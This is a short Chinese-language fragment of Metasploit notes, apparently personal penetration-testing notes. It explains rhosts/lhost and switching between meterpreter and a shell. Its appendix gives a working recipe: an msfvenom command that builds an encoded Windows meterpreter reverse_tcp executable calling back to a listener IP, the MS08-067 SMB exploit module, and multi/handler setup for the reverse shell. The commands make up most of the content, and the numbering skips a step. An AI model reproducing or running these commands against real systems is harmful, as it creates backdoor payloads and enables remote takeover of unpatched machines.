1、 https://blog.csdn.net/xiaopan233/article/details/82808386
2、 https://blog.csdn.net/qq_38240166/article/details/79476678
[rhosts 目标机 lhost 原始攻击机] remoter hosts / local host
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsICOwcjN0ADMxIzNwMDM4EDMy8CX0Vmbu4GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.jpg)
在meterpreter 下输入shell 切换
shell 切换回 meterpreter 直接输入
exit
附录
1、使用 反向连接 方式
1、msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=10.25.40.12 LPORT=1234 -f exe >./lcf.exe
2、use windows/smb/ms08_067_netapi
3、use exploit/multi/handler
4、set payload windows/meterpreter/reverse_tcp
5、show options
7、set LHOST 10.25.40.12